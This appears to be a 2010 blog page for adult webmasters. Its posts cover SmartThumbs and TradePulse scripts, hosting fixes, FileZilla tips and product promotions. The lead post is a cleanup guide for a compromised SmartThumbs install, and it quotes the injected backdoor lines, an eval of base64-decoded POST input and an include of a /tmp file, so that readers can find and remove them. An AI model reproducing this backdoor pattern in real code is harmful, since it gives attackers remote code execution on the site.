DLXER.com adult design studio TradePulse

Remove SmartThumbs exploit in 5 steps

Posted by MMagery on Saturday May 8, 2010

Many webmsters have recently (until last update) noticed rouge sites after clicking on their TGPs and MGPs. Cause was ST exploit and vulnerability in ST that was fixed in last update. However you HAVE TO be sure that your ST is clean. So here is quick tutorial. If you need help with cleaning you can hire system administrator from DLXER.com

1. step - UPDATE your ST to lastest version!

2. step - open st/admin/variables.php file and search for strings @eval(base64_decode($_POST or $qall=1;@include_once in case you find them your ST install is still infected. You have to remove lines:

$qall=1;@include_once(’/tmp/sesa.tmp’);

@eval(base64_decode($_POST [qxp]));//’;

ST variables.php exploit strings

ST variables.php exploit strings

3. step - remove file /tmp/sesa.tmp (command: rm -f /tmp/sesa.tmp) for future protection you can setup 3 min cronjob which will clean all *.tmp files in /tmp/ folder

4. step - cleaning mysql database - first you have to find which mysql database your ST install is using, data is in st/classes/mysql.php after that use phpmyadmin tool and login to your mysql database. Find table st_settings then column niche. You will notice same exploit strings here. You have to remove them.

5. step - lock down your ST install run command php st/admin/lock.php

update: just got update that /tmp/webcam.tmp could be filename for include statement too, so if you have anything like @include_once(’/tmp/XXXXXX.tmp’); in your variables.php file your ST is infected

Security, SmartThumbs | 2 comments »

Killer promo SmartScripts’s SmartTubePro for $199!

Posted by MMagery on Friday Apr 23, 2010

This is a very limited time offer (just found it on forums), STP at only $199! So 20 copies will be sold at $199 only (was $499).

Some limitations thou…

One copy per customer old or new.
You can not re-sell your copy for at least 12 months.
Only if you completely flip a live site including domain you are allowed to sell before the 12 months.

Head over to Smart Scripts and get Smart Tube Pro tube script for adult and mainstream sites and use coupon code “limited199″ (without quotes) to claim your copy.

If you need custom skin for STP check Dlxer.com here.

STP, Software | add comments »

Can’t connect ST server fsock error

Posted by MMagery on Saturday Apr 17, 2010

I just came along one forum post which is about error one webmaster got recently with his SmartThumbs script:

ST update: Can’t connect ST server (fsock error: 0 php_network_getaddresses: getaddrinfo failed: hostname nor servname provided, or not known (Cannot resolve domain name. Domain does not exist or DNS error.))

There is really nothing wrong with ST itself. This is typical error which PHP outputs when local DNS resolver does not work properly. Most likely every script that needs to connect to another domain from your server won’t work and will output similar error. Solution is simple - either send ticket to your adult hosting provider or login with SSH, and edit file /etc/resolv.conf (on most Linux distros) and enter level3 public DNS resolver IPs there - 4.2.2.1 and 4.2.2.3 - save file and refresh ST!

Adult Hosting, SmartThumbs, Software | add comments »

I noticed ST (SmartThumbs - you can download free version here) giving PHP related error “Fatal error: Allowed memory size of n bytes exhausted (tried to allocate n bytes) in path”. No matter how big memory limit was set in php.ini ST managed to exhaust it. Obviously a memory leak. So this has been sorted in latest version. Probably you will have to upload manually working scan_class.php into st/classes directory.

You can find more about this issue here.

Release notes from latest version:

Version 5.77
# added support for new “ns=1″ parameter in st.php (with this parameter “Sell traffic” options are ignored)
# fixed bug with date index page mark (was not replaced with correct date)
# fixed problem with memory limit fatal error (bypassed PHP bug)
# if this update could not download update file unzip scan_class.php file from this zip and upload it in binary mode to st/classes/ folder (then start update again and it should start work).

After update don’t forget to lock your ST!

SmartThumbs, Software | add comments »

DLXER.com - adult design studio

Posted by MMagery on Monday Feb 22, 2010

We have merged all our services for adult webmaster under brand new project / brand called DLXER.com. DLXER is place where all adult webmaster can get top quality service and have their turnkey site developed and hosted. We at DLXER are offering variety of services - custom and premade STP skins, custom skins for other tube scripts, CMS implementation, managed and unmanaged dedicated hosting and stylish web 2.0 designs. So old projects hosterpulse.com and smarttubedesign.com are now merged under DLXER.com!

Make sure you check screenshots in our references, some designs are real eye candies!

our new project for adult webmasters

dlxer.com is our new project for adult webmasters

Software | add comments »

How to count all clicks on your blog with TradePulse

Posted by MMagery on Friday Jan 15, 2010

With this simple script, all clicks on your blog will be tracked by TradePulse so you can even see how productive your traffic is what is VERY hard to do when integrating trade script and WordPress and similar blog content management systems. So surfer will see normal link, when he clicks his click will go thru TradePulse 100% to content by default or you can change parameter to fit your needs and it will even save outgoing domain to which you link in links statistics of TradePulse. So you need to add couple lines of JS code:

<script>
$(document).ready(function(){
$("a").click(function(){
url=$(this).attr('href');
if (url.match(/^http(s)?:\/\//i)){
path=url.replace(/^http(s)?:\/\/(www\.)?/i,'').split(/\//);
$(this).attr('href','/tp/out.php?link=' + path[0] + '&p=100&url=' + escape(url));
}
});
});
</script>

* Script will not track links without http and www inside, so you can use still normal toplists and get them working thru TradePulse, so for example if you have link <a href=”/some/file.php”> this script wont push it thru tp, but if it’s <a href=”http://www.domain.com/some/file.php”> click will be pushed thru TP.
* You need to use JQUERY for this to work, you can download it here: http://docs.jquery.com/Downloading_jQuery and you can see instructions how to setup it here: http://docs.jquery.com/How_jQuery_Works.

You can download free version of Trade Pulse here.

Software, TradePulse | add comments »

Premade Smart Tube Pro templates

Posted by MMagery on Friday Sep 11, 2009

SmartTubeDesign.com have two premade templates for STP script. Templates are priced at $300 per template per domain, but it seems that 4 licences are still available for $200. So if you want something more custom than default theme and you can’t afford yourself completely custom and unique design for STP this would be right choice.

Here is link where you can test dark skin and here is link for lite skin. More info about these skins @ SmartTubeDesign

STP, Software | add comments »

Faster FTP uploading with FileZilla

Posted by MMagery on Friday Oct 10, 2008

I bet you are annoyed with slow FTP uploading speeds. You have to upload file by file and if you have hundreds of them it takes time. And it is so slow… Well there is one pretty neat trick how to make things faster.

This tutorial is for:

  • gallery submitters
  • freesite submitters
  • blog owners (updating WordPress)
  • all who need upload more than 50 files on regular basis

There is one great free FTP client for both Windows and Linux who is able to do that trick - it’s FileZilla.

So let me explain how to enable this option for uploading multiple files at once and thus getting most of your upload speed. I will use version 3.1.3.1 for this tutorial. Once you have downloaded and entered your web site details go to SETTINGS and find TRANSFERS like you can see on the image below:

filezilla-settings

Right now there are only two simultaneous transfers, I suggest you to put 7 or 9. Maybe you may need to lower this number because FTP server on other site will not allow you to make more than 5 connections at same time from single computer (in that case you will need to lower number of simultaneous transfers to 5 or 4).

In case you need hosting who allows you to use multiple simultaneous FTP connections (transfers) click here.

Software | 2 comments »

Chameleon Gallery Submitter database optimization

Posted by MMagery on Friday Sep 5, 2008

We will start with some useful things. There are a lot of webmasters who submit their galleries and if you are pro submiter you definitely need a tool for help. One of the most useful is for sure Chameleon Gallery Submitter.

However submitting with Chameleon Gallery Submitter can be time consuming, boring and unproductive. You will need to optimize your submit process. There are couple things you can optimize. From time you spend on manual submissions to your upload time and disk usage.

So let me explain these three TIPs.

1. Manual gallery submission


After at least 3 months of submitting you need to have statistics about sites who send you traffic. You can use Awstats (almost all hosting now offer this statistics - if your host does not have it you can always check here for hosting). This part of report is called “Links from an external page” in Awstats. Awstats is great because you can filter referer domain you want - just go to “Full List” and use filter there.

This is one of the most valuable tools we need to optimize manual gallery submissions. Once you know how many hits and visits you get from each manually submited TGP you can decide where to submit and where not to submit. With this trick you will remove all that TGPs that send you 10 clicks a month. You don’t need to waste your time for TGPs like this.

Chameleon Gallery Submitter screenshot

2. Reducing upload time

If you check regulary Chameleon Gallery Submitter report tab you will see there which TGPs have got your submission and which did not. You will notice that some of them have blacklisted you for some opscure reasons and some just have odd rules which is pain in the ass to match every time. Those are candidates for removal from your submit database. Removing TGPs that you can’t submit is a must because less HTML will be generated and less time will each gallery upload last.

3. Reducing disk size for gallery

There is one more great disk space saving possibility. If you check Samples tab, you will see a list of thumbnail dimensions and how much TGPs in database need that thumbnail. There can be a lot of thumbnails with 0 TGPs mapped to them. They will be generated and you will upload them if you do not remove that zero entries from that list.

You can buy Chameleon Gallery Submitter here.

Chameleon Gallery Submitter, Software | 1 comment »